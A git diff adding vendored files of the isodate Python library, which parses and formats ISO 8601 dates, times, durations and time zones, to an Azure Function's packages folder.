+# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module defines a method to parse an ISO 8601:2004 date time string. + +For this job it uses the parse_date and parse_time methods defined in the date +and time modules. +''' +from datetime import datetime + +from isodate.isostrf import strftime +from isodate.isostrf import DATE_EXT_COMPLETE, TIME_EXT_COMPLETE, TZ_EXT +from isodate.isodates import parse_date +from isodate.isoerror import ISO8601Error +from isodate.isotime import parse_time + + +def parse_datetime(datetimestring): + ''' + Parses ISO 8601 date-times into datetime.datetime objects. + + This function uses parse_date and parse_time to do the job, so it allows + more combinations of date and time representations than the actual + ISO 8601:2004 standard allows. + ''' + try: + datestring, timestring = datetimestring.split('T') + except ValueError: + raise ISO8601Error("ISO 8601 time designator 'T' missing. Unable to" + " parse datetime string %r" % datetimestring) + tmpdate = parse_date(datestring) + tmptime = parse_time(timestring) + return datetime.combine(tmpdate, tmptime) + + +def datetime_isoformat(tdt, format=DATE_EXT_COMPLETE + 'T' + + TIME_EXT_COMPLETE + TZ_EXT): + ''' + Format datetime strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Extended-Complete as default format. + ''' + return strftime(tdt, format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py new file mode 100644 index 0000000..30db224 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py @@ -0,0 +1,151 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. 
+# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module provides an ISO 8601:2004 duration parser. + +It also provides a wrapper to strftime. This wrapper makes it easier to +format timedelta or Duration instances as ISO conforming strings. +''' +from datetime import timedelta +from decimal import Decimal +import re + +from six import string_types + +from isodate.duration import Duration +from isodate.isoerror import ISO8601Error +from isodate.isodatetime import parse_datetime +from isodate.isostrf import strftime, D_DEFAULT + +ISO8601_PERIOD_REGEX = re.compile( + r"^(?P<sign>[+-])?" + r"P(?!\b)" + r"(?P<years>[0-9]+([,.][0-9]+)?Y)?" + r"(?P<months>[0-9]+([,.][0-9]+)?M)?" + r"(?P<weeks>[0-9]+([,.][0-9]+)?W)?" + r"(?P<days>[0-9]+([,.][0-9]+)?D)?" + r"((?P<separator>T)(?P<hours>[0-9]+([,.][0-9]+)?H)?" + r"(?P<minutes>[0-9]+([,.][0-9]+)?M)?" + r"(?P<seconds>[0-9]+([,.][0-9]+)?S)?)?$") +# regular expression to parse ISO duration strings. + + +def parse_duration(datestring): + """ + Parses ISO 8601 durations into datetime.timedelta or Duration objects. + + If the ISO date string does not contain years or months, a timedelta + instance is returned, else a Duration instance is returned. + + The following duration formats are supported: + -PnnW duration in weeks + -PnnYnnMnnDTnnHnnMnnS complete duration specification + -PYYYYMMDDThhmmss basic alternative complete date format + -PYYYY-MM-DDThh:mm:ss extended alternative complete date format + -PYYYYDDDThhmmss basic alternative ordinal date format + -PYYYY-DDDThh:mm:ss extended alternative ordinal date format + + The '-' is optional. + + Limitations: ISO standard defines some restrictions about where to use + fractional numbers and which component and format combinations are + allowed. This parser implementation ignores all those restrictions and + returns something when it is able to find all necessary components. + In detail: + it does not check whether only the last component has fractions. + it allows weeks specified with all other combinations + + The alternative format does not support durations with years, months or + days set to 0. 
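+
+    A couple of illustrative examples, mirroring the test cases shipped with
+    this package in isodate/tests/test_duration.py:
+      parse_duration('P2W')              -> timedelta(weeks=2)
+      parse_duration('PT36H')            -> timedelta(days=1, hours=12)
+      parse_duration('P3Y6M4DT12H30M5S') -> Duration(years=3, months=6, days=4,
+                                                     hours=12, minutes=30, seconds=5)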
+ """ + if not isinstance(datestring, string_types): + raise TypeError("Expecting a string %r" % datestring) + match = ISO8601_PERIOD_REGEX.match(datestring) + if not match: + # try alternative format: + if datestring.startswith("P"): + durdt = parse_datetime(datestring[1:]) + if durdt.year != 0 or durdt.month != 0: + # create Duration + ret = Duration(days=durdt.day, seconds=durdt.second, + microseconds=durdt.microsecond, + minutes=durdt.minute, hours=durdt.hour, + months=durdt.month, years=durdt.year) + else: # FIXME: currently not possible in alternative format + # create timedelta + ret = timedelta(days=durdt.day, seconds=durdt.second, + microseconds=durdt.microsecond, + minutes=durdt.minute, hours=durdt.hour) + return ret + raise ISO8601Error("Unable to parse duration string %r" % datestring) + groups = match.groupdict() + for key, val in groups.items(): + if key not in ('separator', 'sign'): + if val is None: + groups[key] = "0n" + # print groups[key] + if key in ('years', 'months'): + groups[key] = Decimal(groups[key][:-1].replace(',', '.')) + else: + # these values are passed into a timedelta object, + # which works with floats. + groups[key] = float(groups[key][:-1].replace(',', '.')) + if groups["years"] == 0 and groups["months"] == 0: + ret = timedelta(days=groups["days"], hours=groups["hours"], + minutes=groups["minutes"], seconds=groups["seconds"], + weeks=groups["weeks"]) + if groups["sign"] == '-': + ret = timedelta(0) - ret + else: + ret = Duration(years=groups["years"], months=groups["months"], + days=groups["days"], hours=groups["hours"], + minutes=groups["minutes"], seconds=groups["seconds"], + weeks=groups["weeks"]) + if groups["sign"] == '-': + ret = Duration(0) - ret + return ret + + +def duration_isoformat(tduration, format=D_DEFAULT): + ''' + Format duration strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + P%P (D_DEFAULT) as default format. + ''' + # TODO: implement better decision for negative Durations. + # should be done in Duration class in consistent way with timedelta. + if (((isinstance(tduration, Duration) and + (tduration.years < 0 or tduration.months < 0 or + tduration.tdelta < timedelta(0))) or + (isinstance(tduration, timedelta) and + (tduration < timedelta(0))))): + ret = '-' + else: + ret = '' + ret += strftime(tduration, format) + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py new file mode 100644 index 0000000..7fb7880 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py @@ -0,0 +1,33 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. 
+# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module defines all exception classes in the whole package. +''' + + +class ISO8601Error(ValueError): + '''Raised when the given ISO string can not be parsed.''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py new file mode 100644 index 0000000..96b3dc4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py @@ -0,0 +1,214 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +""" +This module provides an alternative strftime method. + +The strftime method in this module allows only a subset of Python's strftime +format codes, plus a few additional ones. It supports the full range of date +values possible with standard Python date/time objects. Furthermore there are +several pre-defined format strings in this module to ease producing ISO 8601 +conforming strings. 
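+
+A short illustrative example (using the constants defined below):
+
+    strftime(datetime(2012, 10, 12, 8, 29, 46), DT_EXT_COMPLETE)
+
+returns '2012-10-12T08:29:46' for a naive datetime; with tzinfo=UTC the
+trailing %Z code renders as 'Z'.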
+""" +import re +from datetime import date, timedelta + +from isodate.duration import Duration +from isodate.isotzinfo import tz_isoformat + +# Date specific format strings +DATE_BAS_COMPLETE = '%Y%m%d' +DATE_EXT_COMPLETE = '%Y-%m-%d' +DATE_BAS_WEEK_COMPLETE = '%YW%W%w' +DATE_EXT_WEEK_COMPLETE = '%Y-W%W-%w' +DATE_BAS_ORD_COMPLETE = '%Y%j' +DATE_EXT_ORD_COMPLETE = '%Y-%j' +DATE_BAS_WEEK = '%YW%W' +DATE_EXT_WEEK = '%Y-W%W' +DATE_BAS_MONTH = '%Y%m' +DATE_EXT_MONTH = '%Y-%m' +DATE_YEAR = '%Y' +DATE_CENTURY = '%C' + +# Time specific format strings +TIME_BAS_COMPLETE = '%H%M%S' +TIME_EXT_COMPLETE = '%H:%M:%S' +TIME_BAS_MINUTE = '%H%M' +TIME_EXT_MINUTE = '%H:%M' +TIME_HOUR = '%H' + +# Time zone formats +TZ_BAS = '%z' +TZ_EXT = '%Z' +TZ_HOUR = '%h' + +# DateTime formats +DT_EXT_COMPLETE = DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + TZ_EXT +DT_BAS_COMPLETE = DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE + TZ_BAS +DT_EXT_ORD_COMPLETE = DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_COMPLETE + TZ_EXT +DT_BAS_ORD_COMPLETE = DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_COMPLETE + TZ_BAS +DT_EXT_WEEK_COMPLETE = (DATE_EXT_WEEK_COMPLETE + 'T' + + TIME_EXT_COMPLETE + TZ_EXT) +DT_BAS_WEEK_COMPLETE = (DATE_BAS_WEEK_COMPLETE + 'T' + + TIME_BAS_COMPLETE + TZ_BAS) + +# Duration formts +D_DEFAULT = 'P%P' +D_WEEK = 'P%p' +D_ALT_EXT = 'P' + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE +D_ALT_BAS = 'P' + DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE +D_ALT_EXT_ORD = 'P' + DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_COMPLETE +D_ALT_BAS_ORD = 'P' + DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_COMPLETE + +STRF_DT_MAP = {'%d': lambda tdt, yds: '%02d' % tdt.day, + '%f': lambda tdt, yds: '%06d' % tdt.microsecond, + '%H': lambda tdt, yds: '%02d' % tdt.hour, + '%j': lambda tdt, yds: '%03d' % (tdt.toordinal() - + date(tdt.year, + 1, 1).toordinal() + + 1), + '%m': lambda tdt, yds: '%02d' % tdt.month, + '%M': lambda tdt, yds: '%02d' % tdt.minute, + '%S': lambda tdt, yds: '%02d' % tdt.second, + '%w': lambda tdt, yds: '%1d' % tdt.isoweekday(), + '%W': lambda tdt, yds: '%02d' % tdt.isocalendar()[1], + '%Y': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % yds) % tdt.year), + '%C': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % (yds - 2)) % + (tdt.year / 100)), + '%h': lambda tdt, yds: tz_isoformat(tdt, '%h'), + '%Z': lambda tdt, yds: tz_isoformat(tdt, '%Z'), + '%z': lambda tdt, yds: tz_isoformat(tdt, '%z'), + '%%': lambda tdt, yds: '%'} + +STRF_D_MAP = {'%d': lambda tdt, yds: '%02d' % tdt.days, + '%f': lambda tdt, yds: '%06d' % tdt.microseconds, + '%H': lambda tdt, yds: '%02d' % (tdt.seconds / 60 / 60), + '%m': lambda tdt, yds: '%02d' % tdt.months, + '%M': lambda tdt, yds: '%02d' % ((tdt.seconds / 60) % 60), + '%S': lambda tdt, yds: '%02d' % (tdt.seconds % 60), + '%W': lambda tdt, yds: '%02d' % (abs(tdt.days / 7)), + '%Y': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % yds) % tdt.years), + '%C': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % (yds - 2)) % + (tdt.years / 100)), + '%%': lambda tdt, yds: '%'} + + +def _strfduration(tdt, format, yeardigits=4): + ''' + this is the work method for timedelta and Duration instances. + + see strftime for more details. + ''' + def repl(match): + ''' + lookup format command and return corresponding replacement. 
+ ''' + if match.group(0) in STRF_D_MAP: + return STRF_D_MAP[match.group(0)](tdt, yeardigits) + elif match.group(0) == '%P': + ret = [] + if isinstance(tdt, Duration): + if tdt.years: + ret.append('%sY' % abs(tdt.years)) + if tdt.months: + ret.append('%sM' % abs(tdt.months)) + usecs = abs((tdt.days * 24 * 60 * 60 + tdt.seconds) * 1000000 + + tdt.microseconds) + seconds, usecs = divmod(usecs, 1000000) + minutes, seconds = divmod(seconds, 60) + hours, minutes = divmod(minutes, 60) + days, hours = divmod(hours, 24) + if days: + ret.append('%sD' % days) + if hours or minutes or seconds or usecs: + ret.append('T') + if hours: + ret.append('%sH' % hours) + if minutes: + ret.append('%sM' % minutes) + if seconds or usecs: + if usecs: + ret.append(("%d.%06d" % (seconds, usecs)).rstrip('0')) + else: + ret.append("%d" % seconds) + ret.append('S') + # at least one component has to be there. + return ret and ''.join(ret) or '0D' + elif match.group(0) == '%p': + return str(abs(tdt.days // 7)) + 'W' + return match.group(0) + return re.sub('%d|%f|%H|%m|%M|%S|%W|%Y|%C|%%|%P|%p', repl, + format) + + +def _strfdt(tdt, format, yeardigits=4): + ''' + this is the work method for time and date instances. + + see strftime for more details. + ''' + def repl(match): + ''' + lookup format command and return corresponding replacement. + ''' + if match.group(0) in STRF_DT_MAP: + return STRF_DT_MAP[match.group(0)](tdt, yeardigits) + return match.group(0) + return re.sub('%d|%f|%H|%j|%m|%M|%S|%w|%W|%Y|%C|%z|%Z|%h|%%', repl, + format) + + +def strftime(tdt, format, yeardigits=4): + '''Directive Meaning Notes + %d Day of the month as a decimal number [01,31]. + %f Microsecond as a decimal number [0,999999], zero-padded + on the left (1) + %H Hour (24-hour clock) as a decimal number [00,23]. + %j Day of the year as a decimal number [001,366]. + %m Month as a decimal number [01,12]. + %M Minute as a decimal number [00,59]. + %S Second as a decimal number [00,61]. (3) + %w Weekday as a decimal number [0(Monday),6]. + %W Week number of the year (Monday as the first day of the week) + as a decimal number [00,53]. All days in a new year preceding the + first Monday are considered to be in week 0. (4) + %Y Year with century as a decimal number. [0000,9999] + %C Century as a decimal number. [00,99] + %z UTC offset in the form +HHMM or -HHMM (empty string if the + object is naive). (5) + %Z Time zone name (empty string if the object is naive). + %P ISO8601 duration format. + %p ISO8601 duration format in weeks. + %% A literal '%' character. + + ''' + if isinstance(tdt, (timedelta, Duration)): + return _strfduration(tdt, format, yeardigits) + return _strfdt(tdt, format, yeardigits) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py new file mode 100644 index 0000000..5ac7f07 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py @@ -0,0 +1,158 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. 
+# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module provides a method to parse an ISO 8601:2004 time string to a +Python datetime.time instance. + +It supports all basic and extended formats including time zone specifications +as described in the ISO standard. +''' +import re +from decimal import Decimal +from datetime import time + +from isodate.isostrf import strftime, TIME_EXT_COMPLETE, TZ_EXT +from isodate.isoerror import ISO8601Error +from isodate.isotzinfo import TZ_REGEX, build_tzinfo + +TIME_REGEX_CACHE = [] +# used to cache regular expressions to parse ISO time strings. + + +def build_time_regexps(): + ''' + Build regular expressions to parse ISO time strings. + + The regular expressions are compiled and stored in TIME_REGEX_CACHE + for later reuse. + ''' + if not TIME_REGEX_CACHE: + # ISO 8601 time representations allow decimal fractions on least + # significant time component. Comma and Full Stop are both valid + # fraction separators. + # The letter 'T' is allowed as time designator in front of a time + # expression. + # Immediately after a time expression, a time zone definition is + # allowed. + # a TZ may be missing (local time), be a 'Z' for UTC or a string of + # +-hh:mm where the ':mm' part can be skipped. + # TZ information patterns: + # '' + # Z + # +-hh:mm + # +-hhmm + # +-hh => + # isotzinfo.TZ_REGEX + # 1. complete time: + # hh:mm:ss.ss ... extended format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P<hour>[0-9]{2}):" + r"(?P<minute>[0-9]{2}):" + r"(?P<second>[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hhmmss.ss ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P<hour>[0-9]{2})" + r"(?P<minute>[0-9]{2})" + r"(?P<second>[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # 2. reduced accuracy: + # hh:mm.mm ... extended format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P<hour>[0-9]{2}):" + r"(?P<minute>[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hhmm.mm ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P<hour>[0-9]{2})" + r"(?P<minute>[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hh.hh ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P<hour>[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + return TIME_REGEX_CACHE + + +def parse_time(timestring): + ''' + Parses ISO 8601 times into datetime.time objects. + + Following ISO 8601 formats are supported: + (as decimal separator a ',' or a '.' 
is allowed) + hhmmss.ssTZD basic complete time + hh:mm:ss.ssTZD extended complete time + hhmm.mmTZD basic reduced accuracy time + hh:mm.mmTZD extended reduced accuracy time + hh.hhTZD basic reduced accuracy time + TZD is the time zone designator which can be in the following format: + no designator indicates local time zone + Z UTC + +-hhmm basic hours and minutes + +-hh:mm extended hours and minutes + +-hh hours + ''' + isotimes = build_time_regexps() + for pattern in isotimes: + match = pattern.match(timestring) + if match: + groups = match.groupdict() + for key, value in groups.items(): + if value is not None: + groups[key] = value.replace(',', '.') + tzinfo = build_tzinfo(groups['tzname'], groups['tzsign'], + int(groups['tzhour'] or 0), + int(groups['tzmin'] or 0)) + if 'second' in groups: + # round to microseconds if fractional seconds are more precise + second = Decimal(groups['second']).quantize(Decimal('.000001')) + microsecond = (second - int(second)) * int(1e6) + # int(...) ... no rounding + # to_integral() ... rounding + return time(int(groups['hour']), int(groups['minute']), + int(second), int(microsecond.to_integral()), + tzinfo) + if 'minute' in groups: + minute = Decimal(groups['minute']) + second = (minute - int(minute)) * 60 + microsecond = (second - int(second)) * int(1e6) + return time(int(groups['hour']), int(minute), int(second), + int(microsecond.to_integral()), tzinfo) + else: + microsecond, second, minute = 0, 0, 0 + hour = Decimal(groups['hour']) + minute = (hour - int(hour)) * 60 + second = (minute - int(minute)) * 60 + microsecond = (second - int(second)) * int(1e6) + return time(int(hour), int(minute), int(second), + int(microsecond.to_integral()), tzinfo) + raise ISO8601Error('Unrecognised ISO 8601 time format: %r' % timestring) + + +def time_isoformat(ttime, format=TIME_EXT_COMPLETE + TZ_EXT): + ''' + Format time strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Time-Extended-Complete with extended time zone as default format. + ''' + return strftime(ttime, format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py new file mode 100644 index 0000000..f2e86ed --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py @@ -0,0 +1,112 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. 
+# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module provides an ISO 8601:2004 time zone info parser. + +It offers a function to parse the time zone offset as specified by ISO 8601. +''' +import re + +from isodate.isoerror import ISO8601Error +from isodate.tzinfo import UTC, FixedOffset, ZERO + +TZ_REGEX = r"(?P<tzname>(Z|(?P<tzsign>[+-])"\ + r"(?P<tzhour>[0-9]{2})(:?(?P<tzmin>[0-9]{2}))?)?)" + +TZ_RE = re.compile(TZ_REGEX) + + +def build_tzinfo(tzname, tzsign='+', tzhour=0, tzmin=0): + ''' + create a tzinfo instance according to given parameters. + + tzname: + 'Z' ... return UTC + '' | None ... return None + other ... return FixedOffset + ''' + if tzname is None or tzname == '': + return None + if tzname == 'Z': + return UTC + tzsign = ((tzsign == '-') and -1) or 1 + return FixedOffset(tzsign * tzhour, tzsign * tzmin, tzname) + + +def parse_tzinfo(tzstring): + ''' + Parses ISO 8601 time zone designators to tzinfo objects. + + A time zone designator can be in the following format: + no designator indicates local time zone + Z UTC + +-hhmm basic hours and minutes + +-hh:mm extended hours and minutes + +-hh hours + ''' + match = TZ_RE.match(tzstring) + if match: + groups = match.groupdict() + return build_tzinfo(groups['tzname'], groups['tzsign'], + int(groups['tzhour'] or 0), + int(groups['tzmin'] or 0)) + raise ISO8601Error('%s not a valid time zone info' % tzstring) + + +def tz_isoformat(dt, format='%Z'): + ''' + return time zone offset ISO 8601 formatted. + The various ISO formats can be chosen with the format parameter. + + if tzinfo is None returns '' + if tzinfo is UTC returns 'Z' + else the offset is rendered to the given format. + format: + %h ... +-HH + %z ... +-HHMM + %Z ... 
+-HH:MM + ''' + tzinfo = dt.tzinfo + if (tzinfo is None) or (tzinfo.utcoffset(dt) is None): + return '' + if tzinfo.utcoffset(dt) == ZERO and tzinfo.dst(dt) == ZERO: + return 'Z' + tdelta = tzinfo.utcoffset(dt) + seconds = tdelta.days * 24 * 60 * 60 + tdelta.seconds + sign = ((seconds < 0) and '-') or '+' + seconds = abs(seconds) + minutes, seconds = divmod(seconds, 60) + hours, minutes = divmod(minutes, 60) + if hours > 99: + raise OverflowError('can not handle differences > 99 hours') + if format == '%Z': + return '%s%02d:%02d' % (sign, hours, minutes) + elif format == '%z': + return '%s%02d%02d' % (sign, hours, minutes) + elif format == '%h': + return '%s%02d' % (sign, hours) + raise ValueError('unknown format string "%s"' % format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py new file mode 100644 index 0000000..6099e6c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__init__.py @@ -0,0 +1,51 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 